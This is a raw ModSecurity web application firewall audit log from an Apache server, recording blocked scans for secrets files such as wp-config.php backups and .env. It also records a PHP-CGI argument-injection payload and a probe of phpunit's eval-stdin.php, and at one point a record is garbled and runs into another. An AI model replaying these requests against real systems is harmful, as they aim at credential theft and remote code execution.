Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92a6507c-Z-- --5e653201-A-- [18/Apr/2025:07:23:05 +0700] aAGbaRk6uTiIdxrJEES4mwAAAMc 103.236.140.4 52462 103.236.140.4 8181 --5e653201-B-- GET /site/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Accept: */* --5e653201-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e653201-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785429141 800 (- - -) Stopwatch2: 1744935785429141 800; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e653201-Z-- --2f815176-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTlhhbF_BYhFYTXhHwAAAEw 103.236.140.4 52464 103.236.140.4 8181 --2f815176-B-- GET /wp/wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: */* --2f815176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f815176-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785464334 679 (- - -) Stopwatch2: 1744935785464334 679; combined=256, p1=218, p2=0, p3=0, p4=0, p5=38, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f815176-Z-- --5e845b75-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTlhhbF_BYhFYTXhIAAAAEg 103.236.140.4 52466 103.236.140.4 8181 --5e845b75-B-- GET /wp-config.php~bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 Accept: */* --5e845b75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e845b75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785495762 765 (- - -) Stopwatch2: 1744935785495762 765; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e845b75-Z-- --02873e21-A-- [18/Apr/2025:07:23:05 +0700] aAGbaTlhhbF_BYhFYTXhIQAAAEo 103.236.140.4 52468 103.236.140.4 8181 --02873e21-B-- GET /wordpress/wp-config.php.new HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36 Accept: */* --02873e21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02873e21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785528537 683 (- - -) Stopwatch2: 1744935785528537 683; combined=263, p1=235, p2=0, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02873e21-Z-- --f89c302e-A-- [18/Apr/2025:07:23:08 +0700] aAGbbDpR4B6O-aqWibPQVAAAAI8 103.236.140.4 52500 103.236.140.4 8181 --f89c302e-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36 Accept: */* --f89c302e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f89c302e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935788559030 694 (- - -) Stopwatch2: 1744935788559030 694; combined=284, p1=256, p2=0, p3=0, p4=0, p5=28, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f89c302e-Z-- --d7fed778-A-- [18/Apr/2025:10:18:39 +0700] aAHEjxk6uTiIdxrJEEQINAAAAM4 103.236.140.4 38978 103.236.140.4 8181 --d7fed778-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --d7fed778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7fed778-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744946319213653 968 (- - -) Stopwatch2: 1744946319213653 968; combined=466, p1=354, p2=0, p3=0, p4=0, p5=112, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7fed778-Z-- --5117ef22-A-- [18/Apr/2025:10:33:28 +0700] aAHICBk6uTiIdxrJEEQI4wAAAMk 103.236.140.4 42388 103.236.140.4 8181 --5117ef22-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 108.167.133.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 108.167.133.25 X-Forwarded-Proto: http Connection: close Accept: */* --5117ef22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5117ef22-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744947208446148 1706 (- - -) Stopwatch2: 1744947208446148 1706; combined=457, p1=414, p2=0, p3=0, p4=0, p5=43, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5117ef22-Z-- --b2924527-A-- [18/Apr/2025:10:39:10 +0700] aAHJXjlhhbF_BYhFYTUwHAAAAEg 103.236.140.4 43682 103.236.140.4 8181 --b2924527-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --b2924527-C-- --b2924527-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2924527-E-- --b2924527-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744947550638901 5544 (- - -) Stopwatch2: 1744947550638901 5544; combined=3981, p1=587, p2=3358, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2924527-Z-- --ee781d21-A-- [18/Apr/2025:11:05:04 +0700] aAHPcDpR4B6O-aqWibMe0AAAAIY 103.236.140.4 49446 103.236.140.4 8181 --ee781d21-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.2.147.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.2.147.153 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.31.0 Accept: */* Content-Type: application/x-www-form-urlencoded --ee781d21-C-- --ee781d21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee781d21-E-- --ee781d21-H-- Message: Access denied with code 403 (phase 2). String match " allall --b1dcde74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1dcde74-H-- Message: Access denied with code 403 (phase 2). 
Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744949201499083 4112 (- - -) Stopwatch2: 1744949201499083 4112; combined=2405, p1=458, p2=1919, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1dcde74-Z-- --fb16dc6c-A-- [18/Apr/2025:11:27:31 +0700] aAHUsxk6uTiIdxrJEEQK3wAAANY 103.236.140.4 55072 103.236.140.4 8181 --fb16dc6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36 Accept-Charset: utf-8 --fb16dc6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb16dc6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744950451677785 813 (- - -) Stopwatch2: 1744950451677785 813; combined=359, p1=318, p2=0, p3=0, p4=0, p5=40, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb16dc6c-Z-- --ec9d3b6c-A-- [18/Apr/2025:12:24:32 +0700] aAHiEFyj-eUTITfvHEWBmgAAABU 103.236.140.4 39600 103.236.140.4 8181 --ec9d3b6c-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ec9d3b6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec9d3b6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744953872233204 901 (- - -) Stopwatch2: 1744953872233204 901; combined=335, p1=297, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec9d3b6c-Z-- --374dc27e-A-- [18/Apr/2025:13:13:52 +0700] aAHtoBk6uTiIdxrJEEQQsAAAAMA 103.236.140.4 55806 103.236.140.4 8181 --374dc27e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.95.9 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.95.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --374dc27e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --374dc27e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744956832213545 742 (- - -) Stopwatch2: 1744956832213545 742; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --374dc27e-Z-- --da83116b-A-- [18/Apr/2025:13:50:24 +0700] aAH2MDlhhbF_BYhFYTVCrQAAAFQ 103.236.140.4 45590 103.236.140.4 8181 --da83116b-B-- GET /wp-config.php.bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.43.31.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.43.31.214 X-Forwarded-Proto: http Connection: close Accept: */* --da83116b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da83116b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959024637982 828 (- - -) Stopwatch2: 1744959024637982 828; combined=320, p1=277, p2=0, p3=0, p4=0, p5=43, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da83116b-Z-- --f57c8f31-A-- [18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXcwAAAMM 103.236.140.4 59584 103.236.140.4 8181 --f57c8f31-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --f57c8f31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f57c8f31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959971063260 793 (- - -) Stopwatch2: 1744959971063260 793; combined=295, p1=262, p2=0, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f57c8f31-Z-- --69107773-A-- [18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXdAAAAMs 103.236.140.4 59586 103.236.140.4 8181 --69107773-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --69107773-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69107773-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959971305947 653 (- - -) Stopwatch2: 1744959971305947 653; combined=241, p1=212, p2=0, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69107773-Z-- --0a439825-A-- [18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXdwAAAMg 103.236.140.4 59596 103.236.140.4 8181 --0a439825-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --0a439825-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a439825-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959971548558 823 (- - -) Stopwatch2: 1744959971548558 823; combined=313, p1=279, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a439825-Z-- --5771b80a-A-- [18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXeQAAAME 103.236.140.4 59602 103.236.140.4 8181 --5771b80a-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --5771b80a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5771b80a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959971791388 808 (- - -) Stopwatch2: 1744959971791388 808; combined=302, p1=267, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5771b80a-Z-- --2977765e-A-- [18/Apr/2025:14:06:26 +0700] aAH58lyj-eUTITfvHEWQGQAAABE 103.236.140.4 59802 103.236.140.4 8181 --2977765e-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --2977765e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2977765e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959986912496 837 (- - -) Stopwatch2: 1744959986912496 837; combined=338, p1=296, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
